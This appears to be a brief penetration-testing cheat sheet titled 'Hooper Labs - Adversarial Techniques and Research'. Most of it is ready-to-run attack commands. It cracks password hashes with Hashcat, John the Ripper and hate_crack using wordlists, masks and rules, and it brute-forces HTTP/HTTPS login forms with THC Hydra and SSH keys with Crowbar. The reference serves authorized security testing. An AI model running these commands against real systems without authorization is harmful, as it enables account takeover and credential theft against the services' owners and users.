Hooper Labs - Adversarial Techniques and Research

Cracking Passwords & More

Hash Cracking

Hashcat w/Wordlist

	.\hashcat64.exe -m 1000 C:\Users\Cary\Desktop\hash -o C:\path\to\hash E:\path\to\wordlist.txt

Hate Crack (TrustedSec)

	python ../hate_crack/hate_crack.py C:\path\to\hash 1000

John The Ripper (JrR)

	john passwd.hash

John Wordlist

	john passwd.hash --wordlist=rockyou.txt

Hashcat

Hashcat (wordlist)

	hashcat64.exe -m 100 C:\path\to\hashes -o C:\path\to\outfile E:\path\to\wordlist

Hashcat (mask attack / 6 character)

	hashcat64.exe -m 0 C:\path\to\hash -o C:\path\to\outfile -a 3 -1 ?a ?1?1?1?1?1?1

Hashcat (rules)

	hashcat  -m 1000 hash words.txt -w3 -O -r rule.rule

Brute Forcing

THC Hydra

HTTPS form post

	hydra <ip-address> https-form-post "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -l test -P /usr/share/wordlists/rockyou.txt -t 16 -w 30 -o hydra.out.txt -vV

HTTP with user specified

	hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 32 192.168.0.150 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" -vV

Crowbar (Brute SSH Keys)

	crowbar -b sshkey -s <ip>/32 -U userlist -k keys/debian-ssh/uncommon_keys/rsa1/4096/